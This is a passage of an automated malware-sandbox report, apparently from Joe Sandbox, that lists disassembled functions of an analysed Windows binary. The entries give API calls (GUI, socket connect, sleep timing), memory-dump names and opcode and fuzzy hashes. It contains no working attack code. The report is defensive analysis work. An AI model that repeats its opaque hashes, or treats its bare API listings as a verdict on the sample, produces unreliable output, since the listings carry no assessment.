                                                                                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                              Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 004478E2
                                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                              • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                              • TrackPopupMenuEx.USER32(02E964F0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                                              • String ID:
                                                                                              • API String ID: 1300944170-0
                                                                                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                              Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                              • GetCursorPos.USER32(?), ref: 004479D7
                                                                                              • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1822080540-0
                                                                                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                              Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                              • String ID:
                                                                                              • API String ID: 659298297-0
                                                                                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                              Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(02E91B00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                • Part of subcall function 00440D98: SendMessageW.USER32(02E91B00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                                              • String ID:
                                                                                              • API String ID: 142311417-0
                                                                                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                              Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                              Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00445879
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                              • _wcslen.LIBCMT ref: 004458FB
                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3087257052-0
                                                                                              • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                              • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                              Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 245547762-0
                                                                                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                              Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                              • BeginPath.GDI32(?), ref: 0044723D
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                                              • String ID:
                                                                                              • API String ID: 2338827641-0
                                                                                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                              Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                              • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                              • String ID:
                                                                                              • API String ID: 2875609808-0
                                                                                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                              Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                              • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                              • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3741023627-0
                                                                                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                              Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                              • String ID:
                                                                                              • API String ID: 4023252218-0
                                                                                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                              Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1489400265-0
                                                                                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                              Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                              • DestroyWindow.USER32(?), ref: 00455728
                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                              • String ID:
                                                                                              • API String ID: 1042038666-0
                                                                                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                              Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0041780F
                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                              • __getptd.LIBCMT ref: 00417826
                                                                                              • __amsg_exit.LIBCMT ref: 00417834
                                                                                              • __lock.LIBCMT ref: 00417844
                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
